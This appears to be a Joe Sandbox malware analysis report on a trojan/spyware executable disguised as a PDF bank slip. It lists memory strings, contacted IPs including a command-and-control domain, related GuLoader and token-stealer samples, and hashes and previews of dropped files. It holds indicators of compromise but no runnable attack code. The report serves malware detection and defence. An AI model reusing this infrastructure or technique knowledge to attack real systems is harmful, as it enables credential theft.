50.23.12.20.in-addr.arpa	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/14436606/23354	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034151000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-netJ	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discordapp.com/api/v9/users/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/mgravell/protobuf-net	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2677441911.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039FE000.00000004.00000020.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2677560421.0000000003A16000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	BANK SLIP_TT COPY 2-13-2024_pdf.exe	false	high
https://www.ecosia.org/newtab/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.mozilla.org/products/firefox	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034349000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	BANK SLIP_TT COPY 2-13-2024_pdf.exe	false	high
https://github.com/mgravell/protobuf-neti	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	false	high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A4A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2771075671.00000000039A8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://stackoverflow.com/q/11564914/23354;	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	false	high
https://stackoverflow.com/q/2152978/23354	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2798827157.0000000036560000.00000004.08000000.00040000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://icanhazip.com/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	false	high
https://steamcommunity.com/profiles/	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2794968313.0000000034236000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2641038170.0000000003A53000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.mozilla.org	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A3A000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000003.2738677101.0000000035A42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.000000003523F000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.0000000035225000.00000004.00000800.00020000.00000000.sdmp, BANK SLIP_TT COPY 2-13-2024_pdf.exe, 00000006.00000002.2795914734.00000000351BE000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.18.14	drive.google.com	United States	15169	GOOGLEUS	false
46.161.0.101	ghos008.duckdns.org	Russian Federation	59504	HostingvpsvilleruRU	false
142.250.185.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1615352
Start date and time:	2025-02-14 19:48:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BANK SLIP_TT COPY 2-13-2024_pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/14@6/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 89% Number of executed functions: 328 Number of non-executed functions: 64
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200, 40.69.42.241, 20.12.23.50, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:50:18	API Interceptor	35x Sleep call for process: BANK SLIP_TT COPY 2-13-2024_pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.161.0.101	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse
46.161.0.101	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ghos008.duckdns.org	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	46.161.0.101
	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse	46.161.0.101
	Request for Quotation_TRT10102025_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	5.188.166.31
	1.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	5.188.166.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HostingvpsvilleruRU	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	46.161.0.101
	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse	46.161.0.101
	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	45.142.208.144
	rShipmentDocuments.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.230.141.85
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.230.141.85
	Bill of Lading.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.230.141.85
	LisectAVT_2403002A_149.exe	Get hash	malicious	Amadey	Browse	80.76.42.67
	am.exe	Get hash	malicious	Amadey	Browse	80.76.42.67
	a.exe	Get hash	malicious	Amadey	Browse	80.76.42.67
	kdevtmpfsi	Get hash	malicious	Xmrig	Browse	185.156.179.225

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse	172.217.18.14 142.250.185.225
	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse	172.217.18.14 142.250.185.225
	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	172.217.18.14 142.250.185.225
	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse	172.217.18.14 142.250.185.225
	blessed.ps1	Get hash	malicious	FormBook	Browse	172.217.18.14 142.250.185.225
	_747031500 D747031500_A.html	Get hash	malicious	Remcos	Browse	172.217.18.14 142.250.185.225
	747031500_D747031500_A.js	Get hash	malicious	Remcos	Browse	172.217.18.14 142.250.185.225
	payload.ps1	Get hash	malicious	Kdot Stealer	Browse	172.217.18.14 142.250.185.225
	4a. RFx-4045.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.217.18.14 142.250.185.225

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse
	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse
	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse
	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse
	Hydroponically.exe	Get hash	malicious	GuLoader	Browse
	RFQ Al Geemi_MiddleEast_Project 2025 BOQ.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse
	Request for Quotation.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse
	Payment_Swift Copy_ TT0901844095342_pdf.exe	Get hash	malicious	GuLoader	Browse
	Request for Quotation_TRT10102025_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse
	nRNzqQOQwk.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK SLIP_TT COPY 2-13-2024_pdf.exe.log

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1434
Entropy (8bit):	5.342612360333169
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhRAE4KzecKIE4oKNzKoZsXE4qdKqE4Kx1qE4TE4KmJE4j:MxHKlYHKh3oRAHKzectHo60H8HKx1qHd
MD5:	DED544725C0FC4A9C1A4064260007227
SHA1:	C196627F0D20E14F0240201AC995E9BEBC399C29
SHA-256:	82F1B25C0D0DC1B72BFE5E837B668E0087D7E469CCCF909924B72FEC5C1C8F10
SHA-512:	41A800B36C9017CB5B9D427C9AD317ACAC680FCE5FF85391497F6BE489782423B7E22A27CD7211C2E110B5465418747841A42A16C40D1A41A0CD27D192F2A7A5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

C:\Users\user\AppData\Local\Temp\nsgEB09.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.7711167426271945
Encrypted:	false
SSDEEP:	192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
MD5:	3F176D1EE13B0D7D6BD92E1C7A0B9BAE
SHA1:	FE582246792774C2C9DD15639FFA0ACA90D6FD0B
SHA-256:	FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
SHA-512:	0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: INV-2025792 Payment_Summary Ref_4300.exe, Detection: malicious, Browse Filename: INV-2025792 Payment_Summary Ref_4300.exe, Detection: malicious, Browse Filename: Quote-370-UAE-24_pdf.exe, Detection: malicious, Browse Filename: Commercial Offer PVT9864092001-2024_pdf.exe, Detection: malicious, Browse Filename: Hydroponically.exe, Detection: malicious, Browse Filename: RFQ Al Geemi_MiddleEast_Project 2025 BOQ.exe, Detection: malicious, Browse Filename: Request for Quotation.exe, Detection: malicious, Browse Filename: Payment_Swift Copy_ TT0901844095342_pdf.exe, Detection: malicious, Browse Filename: Request for Quotation_TRT10102025_pdf.exe, Detection: malicious, Browse Filename: nRNzqQOQwk.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Benjoin210.une

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	757950
Entropy (8bit):	0.15687882920494683
Encrypted:	false
SSDEEP:	768:zTLIxgoIoXHCk2vWdE1s/I/2qaXyJ7hV9dFUIFSr:m
MD5:	7A74CD3FE97ED3F7A1FE85B872C54196
SHA1:	DD31EDDA99421EB4A0ABE10B47243FEA5916FB95
SHA-256:	48EB422D9DA6ABB555CDF522BA7884C26A7AE1CCF6174B24395CFC5E39A80264
SHA-512:	D213BFCB3B7F7C4256340897F41B4AEBFDBA262D4DAE25A87C4178144FD14B75C85954AB72C9C73FE6E7E7B676D538D86FC5C4D0C162F92A8CEE1D6ABB89A687
Malicious:	false
Reputation:	low
Preview:	SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSASSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSZ(SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSmSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSZSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Bygningskonduktrens.Tok

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	Matlab v4 mat-file (little endian) C, numeric, rows 16711168, columns 16185078, imaginary
Category:	dropped
Size (bytes):	301846
Entropy (8bit):	7.703203679341792
Encrypted:	false
SSDEEP:	6144:n1gtWD5n697IKy62O3+pJKAaThZoJBjQgJZl4BqceOp7:n1gtYk97IKy3u+pJKAYo7sBBqc5p7
MD5:	3971D3991C2286AC17959DCD0FFDDE72
SHA1:	78C44703D24E83DA154D5F949C57F731B7DE14FA
SHA-256:	CE9333242BAB856C733889A9D1CF4F11A4DE6F68D1FF7254B9925A3A9F2B955B
SHA-512:	64E335F61C6B7616A44427E564FC0317011B7C197C3EC65801B53A7CE88DF63421DB1A18AF8CDD7F440C0452B9B03D496F3222196D1554250863EB5754F97E2A
Malicious:	false
Reputation:	low
Preview:	.................y.CC....................w...................d.......nnnnnnn............................%..h................kkk.................55......444444....>>>>>.j.jjj.........r...................*...V....jj.....))....H......................=.......xxxx................................./..9999..................e..................LL....III......dd.$...................??.......)))).$$$$.............'.........oooo..55....ww...n........................]........NNNNN.jjj...J................. ............................2......M.''.g.......".....ii..L.....-........;...ffff..P............................vv........"...pp....CC...y.........Y....Q.d.........................;.....vvvvv................2222..................................+....a............................++.g...............#.............N....o..............................qqq...................--..E.........................................II.......44.................k.pp...NN..q..99.dd.888...................WWWW..d.ZZZZ....

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Mejemaskinens.Foe

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	122525
Entropy (8bit):	4.615988616712526
Encrypted:	false
SSDEEP:	1536:uWMgp51ws4uRvuO0JkwMdZ/F/RSNUzZ14SiJdYcDygZMmiR8eHS:wW5+2nrzJRS+z34SiLhqmcNS
MD5:	55CCDDA79685D00311246AB1FF53AF30
SHA1:	2656C5A6B65A4A16607F606DFF9AE882EC83F90B
SHA-256:	19EB65433BF4FD26E8650C24FCE656251461001C5737DCF22A785F958AA6F29A
SHA-512:	394BA48DCDE8C04DE042A4A638D1BF0C1810CDC8493D1FC4D1C95043454C712903835E2536AAAC114DD9D307EF8671C909841EED52ED517CDF2204F229587414
Malicious:	false
Reputation:	low
Preview:	......YYYY......4.EEE.2..NNNNNNNNNNNN.11....$...............}..MMMMM......................4......A.:.z..333.`...C.......44..........!!...J........uu.......y................................fff.XX......555.......................PPP...................Z...........##.....{{{......$$..............Q...vvvvv...l....??????.+..44.......h.........22.rr.........hh......77....F........=..............[[............pp..>..................V.~..............1.........))............'....KKKK..\..TT...........4...ww..TT.......V...............MMMMM..........#.....RR.........p........;;;.............BBBB.................@@..........GGGG..>>>.......}.+..rrr.999..b......[.....`.......................].........................7...........E.......999.....??...........j.........................................Q.SSS..............}.........zz......SS.............]]]].QQ....2222...............................7.....ff......p.........HH.......z..RRRRRR......66....................\|\|...............nn........ ....BBB...

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\coprodaeum.sla

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	4756284
Entropy (8bit):	0.15829166662672456
Encrypted:	false
SSDEEP:	768:ffBCuuOEnfPHTo+eAKy9ZDHmF8sKWMBrN/iRtY0f2dvTivVx+QbTlhu++6Zxyiij:foSgPD
MD5:	BF2D2FFAB063401F7A560520894502DA
SHA1:	A52091A430B1BA2FE4307F1D1B5E56B9DF658AC0
SHA-256:	5AD8FB4FE6B46AA5FBE3A49BF82EB4CEC02F2649278A550EAF6041A0EF0CCD0C
SHA-512:	11430199237F5DFF5C1AF9C43A253FA72558C1135EF4553AD6DEEA6EC2147E7E3970616E460427A9B81EC094B9F91B46B576D51C8D94CB76B15CD29118DF9CF2
Malicious:	false
Reputation:	low
Preview:	SSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSuSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS]SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSjSSSSSSSSSSSS?SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS[SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS

C:\Users\user\AppData\Local\trder\unacquisitiveness\skaldyrsalaters\Opinionsmaalings\deynt.pro

Download File

Process:	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	1781988
Entropy (8bit):	0.15888955341786837
Encrypted:	false
SSDEEP:	768:eyrPrtAlKWWTspgmCY9bqF+hUeJBOsjolxuQLqVh2VKGqdO17hddVzw8ghSdJbGJ:+
MD5:	52E6EC2BDBBE19F9CF8F6AC2A5D06FC7
SHA1:	709E2569B17365AAA67A4C6A2E74C6C4B382E5F9
SHA-256:	27E548B1F944836D314F394E244889A6B6ACAE735ED6A14EE3000824056C8FBA
SHA-512:	AB2459D884302EBBCE5CA4241F3C4A93B2390DC7FD9276FAF3716C7B27FC912467D52C9ED1A71433443C4D688C0172F6B6FCB34010018F468B0A1E59F9A435E8
Malicious:	false
